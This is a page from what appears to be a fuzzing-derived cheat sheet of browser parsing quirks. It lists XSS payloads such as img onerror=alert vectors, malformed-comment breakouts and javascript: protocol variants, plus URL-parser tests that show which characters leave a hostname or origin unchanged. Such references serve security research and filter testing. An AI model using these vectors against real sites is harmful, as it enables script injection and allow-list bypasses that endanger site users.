Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 153 vectors with results

if (new URL("javascript"+String.fromCodePoint(parseInt(9..toString(16),16))+":alert()").protocol=="javascript:"){alert(9)}

Source: Characters allowed javascript and colon copy2

Author: avlidienbrunn

JSURL HandlingChromeSafari

if (new URL("javascript"+String.fromCodePoint(parseInt(10..toString(16),16))+":alert()").protocol=="javascript:"){alert(10)}

Source: Characters allowed javascript and colon copy2

Author: avlidienbrunn

JSURL HandlingChromeSafari

if (new URL("javascript"+String.fromCodePoint(parseInt(13..toString(16),16))+":alert()").protocol=="javascript:"){alert(13)}

Source: Characters allowed javascript and colon copy2

Author: avlidienbrunn

JSURL HandlingChromeSafari

if (new URL("javascript"+String.fromCodePoint(parseInt(58..toString(16),16))+":alert()").protocol=="javascript:"){alert(58)}

Source: Characters allowed javascript and colon copy2

Author: avlidienbrunn

JSURL HandlingChromeSafari

let chr = String.fromCodePoint(9);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(9)

Source: Characters allowed in the protocol that still resolve host name

Author: hackvertor

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

let chr = String.fromCodePoint(10);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(10)

Source: Characters allowed in the protocol that still resolve host name

Author: hackvertor

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

let chr = String.fromCodePoint(13);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(13)

Source: Characters allowed in the protocol that still resolve host name

Author: hackvertor

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

let chr = String.fromCodePoint(43);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(43)

Source: Characters allowed in the protocol that still resolve host name

Author: hackvertor

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

let chr = String.fromCodePoint(45);0x0D
new URL("foo"+chr+"bar://example.com").host === "example.com" && alert(45)

Source: Characters allowed in the protocol that still resolve host name

Author: hackvertor

JSURL HandlingChromeFirefoxSafariMicrosoft Edge

<a href="0x01javascript:test.com/" id="test"></a>

Source: Characters that can precede the javascript protocol

Author: renniepak

XSSURL HandlingChromeFirefoxSafari

<a href="0x02javascript:test.com/" id="test"></a>

Source: Characters that can precede the javascript protocol

Author: renniepak

XSSURL HandlingChromeFirefoxSafari

<a href="0x03javascript:test.com/" id="test"></a>

Source: Characters that can precede the javascript protocol

Author: renniepak

XSSURL HandlingChromeFirefoxSafari

<a href="0x04javascript:test.com/" id="test"></a>

Source: Characters that can precede the javascript protocol

Author: renniepak

XSSURL HandlingChromeFirefoxSafari

<a href="0x05javascript:test.com/" id="test"></a>

Source: Characters that can precede the javascript protocol

Author: renniepak

XSSURL HandlingChromeFirefoxSafari

--><!---><script>alert(45)</script>

Source: Malformed HTML comments

Author: hackvertor

XSSHTML ParsingChromeFirefoxSafari

--><!-->><script>alert(62)</script>

Source: Malformed HTML comments

Author: hackvertor

XSSHTML ParsingChromeFirefoxSafari

<a id="x" href="https://0x00.com">

Source: Unicode characters with a decomposition of 2+ ASCII characters and are registerable domains

Author: 0x999-x

XSSURL HandlingChromeSafariFirefox

if (new URL("https://google.com0x090x09/endpoint").host=="google.com"){alert(9)}

Source: Characters appended at the end of TLD within URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChrome

if (new URL("https://google.com##/endpoint").host=="google.com"){alert(35)}

Source: Characters appended at the end of TLD within URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChrome

if (new URL("https://google.com///endpoint").host=="google.com"){alert(47)}

Source: Characters appended at the end of TLD within URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChrome

if (new URL("https://google.com??/endpoint").host=="google.com"){alert(63)}

Source: Characters appended at the end of TLD within URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChrome

if (new URL("https://google.com\\/endpoint").host=="google.com"){alert(92)}

Source: Characters appended at the end of TLD within URL, which yield in the same host property

Author: InsertScript

JSURL HandlingChrome

<<img/src/onerror=alert(1)>

Source: Characters between < and element name

Author: ThomasOrlita

HTMLHTML ParsingChromeSafariFirefoxMicrosoft Edge

<img src=x0x09onerror=alert(9)>

Source: Characters that end unencapsulated HTML attribute values

Author: ola456

XSSDOM BehaviorChromeSafariFirefox

<img src=x
onerror=alert(10)>

Source: Characters that end unencapsulated HTML attribute values

Author: ola456

XSSDOM BehaviorChromeSafariFirefox

<img src=x0x0Conerror=alert(12)>

Source: Characters that end unencapsulated HTML attribute values

Author: ola456

XSSDOM BehaviorChromeSafariFirefox

<img src=x0x0Donerror=alert(13)>

Source: Characters that end unencapsulated HTML attribute values

Author: ola456

XSSDOM BehaviorChromeSafariFirefox

<img src=x onerror=alert(32)>

Source: Characters that end unencapsulated HTML attribute values

Author: ola456

XSSDOM BehaviorChromeSafariFirefox

if (new URL("https://example.com" + String.fromCodePoint(9) + "/").hostname === 'example.com'){alert(9)}

Source: Characters allowed between hostname and / but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

if (new URL("https://example.com" + String.fromCodePoint(10) + "/").hostname === 'example.com'){alert(10)}

Source: Characters allowed between hostname and / but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

if (new URL("https://example.com" + String.fromCodePoint(13) + "/").hostname === 'example.com'){alert(13)}

Source: Characters allowed between hostname and / but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

if (new URL("https://example.com" + String.fromCodePoint(35) + "/").hostname === 'example.com'){alert(35)}

Source: Characters allowed between hostname and / but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

if (new URL("https://example.com" + String.fromCodePoint(47) + "/").hostname === 'example.com'){alert(47)}

Source: Characters allowed between hostname and / but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

(new URL("https:" + String.fromCodePoint(0) + "example.com","https://shazzer.co.uk").origin === new URL("https://shazzer.co.uk").origin) && (new URL("https:" + String.fromCodePoint(0) + "example.com").origin === new URL("https://example.com").origin) && alert(0 + " >> " + String.fromCodePoint(0))0x0D
0x0D

Source: Scheme slash alternatives in URL() when a base is used

Author: N25sec

JSURL HandlingChromeFirefoxMicrosoft Edge

if (new URL("https://example" + String.fromCharCode(i) + "com").host == "example.com") alert(i)

Source: URL domain dot alternatives

Author: JorianWoltjer

JSURL HandlingChromeFirefoxSafari

char = String.fromCodePoint(60)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
    new URL(url)0x0D
}0x0D
catch(e){0x0D
    anchor.href=url0x0D
    if(anchor.protocol !== ':'){alert(60)}0x0D
}

Source: Url parsing diff b/w anchor.href and new URL

Author: Sudistark

JSURL HandlingSafari

char = String.fromCodePoint(62)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
    new URL(url)0x0D
}0x0D
catch(e){0x0D
    anchor.href=url0x0D
    if(anchor.protocol !== ':'){alert(62)}0x0D
}

Source: Url parsing diff b/w anchor.href and new URL

Author: Sudistark

JSURL HandlingSafari

char = String.fromCodePoint(64)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
    new URL(url)0x0D
}0x0D
catch(e){0x0D
    anchor.href=url0x0D
    if(anchor.protocol !== ':'){alert(64)}0x0D
}

Source: Url parsing diff b/w anchor.href and new URL

Author: Sudistark

JSURL HandlingSafari

char = String.fromCodePoint(91)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
    new URL(url)0x0D
}0x0D
catch(e){0x0D
    anchor.href=url0x0D
    if(anchor.protocol !== ':'){alert(91)}0x0D
}

Source: Url parsing diff b/w anchor.href and new URL

Author: Sudistark

JSURL HandlingSafari

char = String.fromCodePoint(92)0x0D
url = "javascript://google.com"+char0x0D
0x0D
try {0x0D
    new URL(url)0x0D
}0x0D
catch(e){0x0D
    anchor.href=url0x0D
    if(anchor.protocol !== ':'){alert(92)}0x0D
}

Source: Url parsing diff b/w anchor.href and new URL

Author: Sudistark

JSURL HandlingSafari

<img src=x onerror0x09=alert(9)>

Source: Character allowed after onerror event

Author: InsertScript

XSSHTML ParsingChromeFirefoxSafari

<img src=x onerror
=alert(10)>

Source: Character allowed after onerror event

Author: InsertScript

XSSHTML ParsingChromeFirefoxSafari

<img src=x onerror0x0C=alert(12)>

Source: Character allowed after onerror event

Author: InsertScript

XSSHTML ParsingChromeFirefoxSafari

<img src=x onerror0x0D=alert(13)>

Source: Character allowed after onerror event

Author: InsertScript

XSSHTML ParsingChromeFirefoxSafari

<img src=x onerror =alert(32)>

Source: Character allowed after onerror event

Author: InsertScript

XSSHTML ParsingChromeFirefoxSafari

<a href="javascript0x09:" id=x></a>

Source: Characters allowed before the JavaScript protocol colon

Author: RemakingEden

XSSURL HandlingFirefoxChrome

<a href="javascript
:" id=x></a>

Source: Characters allowed before the JavaScript protocol colon

Author: RemakingEden

XSSURL HandlingFirefoxChrome

<a href="javascript0x0D:" id=x></a>

Source: Characters allowed before the JavaScript protocol colon

Author: RemakingEden

XSSURL HandlingFirefoxChrome

<a href="javascript::" id=x></a>

Source: Characters allowed before the JavaScript protocol colon

Author: RemakingEden

XSSURL HandlingFirefoxChrome

if (new URL("https://example.com" + String.fromCodePoint(0)).hostname === 'example.com'){alert(0)}

Source: Characters allowed after hostname but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

if (new URL("https://example.com" + String.fromCodePoint(1)).hostname === 'example.com'){alert(1)}

Source: Characters allowed after hostname but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

if (new URL("https://example.com" + String.fromCodePoint(2)).hostname === 'example.com'){alert(2)}

Source: Characters allowed after hostname but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

if (new URL("https://example.com" + String.fromCodePoint(3)).hostname === 'example.com'){alert(3)}

Source: Characters allowed after hostname but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

if (new URL("https://example.com" + String.fromCodePoint(4)).hostname === 'example.com'){alert(4)}

Source: Characters allowed after hostname but don't change the hostname

Author: ThomasOrlita

JSURL HandlingChromeSafariFirefox

<! <a/b="--><img/src/onerror=alert(1)>"

Source: Characters that can start an HTML comment

Author: 0x999-x

HTMLHTML ParsingChromeFirefoxSafari

</ <a/b="--><img/src/onerror=alert(1)>"

Source: Characters that can start an HTML comment

Author: 0x999-x

HTMLHTML ParsingChromeFirefoxSafari

<? <a/b="--><img/src/onerror=alert(1)>"

Source: Characters that can start an HTML comment

Author: 0x999-x

HTMLHTML ParsingChromeFirefoxSafari

if (new URL("https://google.com0x090x09/endpoint").origin=="https://google.com"){alert(9)}

Source: Characters appended at the end of TLD within URL, which yield in the same Origin

Author: hansmach1ne

JSURL HandlingChromeFirefox

if (new URL("https://google.com##/endpoint").origin=="https://google.com"){alert(35)}

Source: Characters appended at the end of TLD within URL, which yield in the same Origin

Author: hansmach1ne

JSURL HandlingChromeFirefox

if (new URL("https://google.com///endpoint").origin=="https://google.com"){alert(47)}

Source: Characters appended at the end of TLD within URL, which yield in the same Origin

Author: hansmach1ne

JSURL HandlingChromeFirefox

if (new URL("https://google.com??/endpoint").origin=="https://google.com"){alert(63)}

Source: Characters appended at the end of TLD within URL, which yield in the same Origin

Author: hansmach1ne

JSURL HandlingChromeFirefox

if (new URL("https://google.com\\/endpoint").origin=="https://google.com"){alert(92)}

Source: Characters appended at the end of TLD within URL, which yield in the same Origin

Author: hansmach1ne

JSURL HandlingChromeFirefox

<p><img/src/onerror=alert(1)></p>

Source: < removal bypass

Author: Device1306

HTMLHTML ParsingFirefoxChrome

if (new URL("javascript0x09:alert()").protocol=="javascript:"){alert(9)}

Source: Characters allowed javascript and colon

Author: renniepak

JSURL HandlingChromeSafariFirefox

if (new URL("javascript::alert()").protocol=="javascript:"){alert(58)}

Source: Characters allowed javascript and colon

Author: renniepak

JSURL HandlingChromeSafariFirefox

if (new URL("javascript\:alert()").protocol=="javascript:"){alert(92)}

Source: Characters allowed javascript and colon

Author: renniepak

JSURL HandlingChromeSafariFirefox

eval('""');alert(34);

Source: Characters to break out from eval string

Author: m-boll

JSJavaScript SyntaxFirefoxChromeSafari

Page 3 of 8

« Prev Next »

Cheat Sheet

Distributed Fuzzing